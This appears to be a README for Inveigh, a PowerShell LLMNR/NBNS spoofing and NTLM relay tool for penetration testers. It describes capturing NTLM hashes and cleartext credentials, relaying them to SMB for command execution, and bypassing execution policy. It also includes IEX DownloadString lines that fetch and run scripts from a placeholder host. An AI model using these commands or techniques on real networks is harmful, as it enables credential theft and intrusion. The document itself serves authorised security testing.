Windows PowerShell LLMNR/NBNS spoofer
Inveigh is a Windows PowerShell LLMNR/NBNS spoofer designed to assist penetration testers that find themselves limited to a Windows system. This can commonly occur while performing phishing attacks, USB drive attacks, VLAN pivoting, or simply being restricted to a Windows system as part of client imposed restrictions.
Import
To import with Import-Module:
Import-Module ./Inveigh.psd1
To import using the dot source method:
. ./Inveigh.ps1
. ./Inveigh-BruteForce.ps1
. ./Inveigh-Relay.ps1
To load into memory using Invoke-Expression:
IEX (New-Object Net.WebClient).DownloadString(“http://yourhost/Inveigh.ps1”)
IEX (New-Object Net.WebClient).DownloadString(“http://yourhost/Inveigh-Unprivileged.ps1”)
IEX (New-Object Net.WebClient).DownloadString(“http://yourhost/Inveigh-Relay.ps1”)
System Requirements
Tested minimums are PowerShell 2.0 and .NET 3.5
Functions
Invoke-Inveigh
The main Inveigh LLMNR/NBNS spoofer function.
Privilege Requirements:
Elevated Administrator or SYSTEM
Features
IPv4 LLMNR/NBNS spoofer with granular control
NTLMv1/NTLMv2 challenge/response capture over HTTP/HTTPS/SMB
Basic auth cleartext credential capture over HTTP/HTTPS
WPAD server capable of hosting a basic or custom wpad.dat file
HTTP/HTTPS server capable of hosting limited content
Granular control of console and file output
Run time control
Invoke-InveighUnprivileged
Inveigh LLMNR/NBNS spoofer function that does not require local administrator access.
Privilege Requirements:
Regular User
Features:
IPv4 NBNS spoofer with granular control that can be run with or without disabling the local NBNS service
IPv4 LLMNR spoofer with granular control that can be run only with the local LLMNR service disabled
Targeted IPv4 NBNS brute force spoofer with granular control
NTLMv1/NTLMv2 challenge/response capture over HTTP
Basic auth cleartext credential capture over HTTP
WPAD server capable of hosting a basic or custom wpad.dat file
HTTP server capable of hosting limited content
Granular control of console and file output
Run time control
Invoke-InveighRelay
The NTLMv2 HTTP/HTTPS to SMB relay command execution function. This function can be used with or without Invoke-Inveigh.
Privilege Requirements:
Elevated Administrator or SYSTEM
Features:
HTTP/HTTPS to SMB NTLMv2 relay with granular control
NTLMv1/NTLMv2 challenge/response capture over HTTP/HTTPS
Granular control of console and file output
Clear-Inveigh
Clear Inveigh data from memory
Get-Inveigh
Get Inveigh data from memory – Parameters: Console, ClearText, CleartextUnique, Learning, Log, NTLMv1, NTLMv1Unique, NTLMv1Usernames, NTLMv2, NTLMv2Unique, NTLMv2Usernames
Stop-Inveigh
Stop all running Inveigh functions
Watch-Inveigh
Enable real time console output
Usage
Obtain an elevated administrator or SYSTEM shell. If necessary, use a method to bypass script execution policy.
Git Clone
git clone https://github.com/johnjohnsp1/Inveigh.git
To execute with default settings:
Inveigh.ps1 -i localip
To execute with features enabled/disabled:
Inveigh.ps1 -i localip -LLMNR Y/N -NBNS Y/N -HTTP Y/N -HTTPS Y/N -SMB Y/N -Repeat Y/N -ForceWPADAuth Y/N
Download